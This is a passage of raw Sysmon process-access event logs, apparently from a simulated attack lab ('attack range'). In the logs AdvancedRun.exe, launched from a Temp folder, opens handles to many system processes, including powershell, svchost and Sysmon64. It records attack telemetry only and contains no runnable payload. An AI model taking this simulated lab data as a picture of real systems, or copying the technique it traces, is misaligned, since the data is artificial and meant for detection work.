emp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
